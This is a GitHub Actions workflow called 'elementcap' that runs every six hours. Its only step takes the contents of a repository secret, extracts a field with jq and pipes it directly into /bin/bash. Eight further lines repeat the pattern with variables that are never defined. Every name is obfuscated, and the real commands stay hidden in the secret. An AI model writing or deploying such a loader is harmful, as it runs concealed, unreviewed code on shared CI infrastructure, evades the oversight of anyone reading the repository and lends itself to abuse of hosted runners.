name: elementcap

on:
  workflow_dispatch:
  schedule:
    - cron: '28 3/6 * * *'
jobs:  # 26220
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: elementcap
        env:
          hfj30071: ${{ secrets.hfj30071 }}
        run: |
          echo $hfj30071 | jq -r .tu2 | /bin/bash
          echo $jsa92 | jq -r .otap9 | /bin/bash
          echo $iitdf12 | jq -r .pexfe248 | /bin/bash
          echo $xmz0075 | jq -r .nm0702 | /bin/bash
          echo $zr998 | jq -r .qc516 | /bin/bash
          echo $zb5303 | jq -r .auoas11719 | /bin/bash
          echo $dh03 | jq -r .uln4 | /bin/bash
          echo $hro67665 | jq -r .bcgxj9 | /bin/bash
          echo $rshk536 | jq -r .whi9603 | /bin/bash

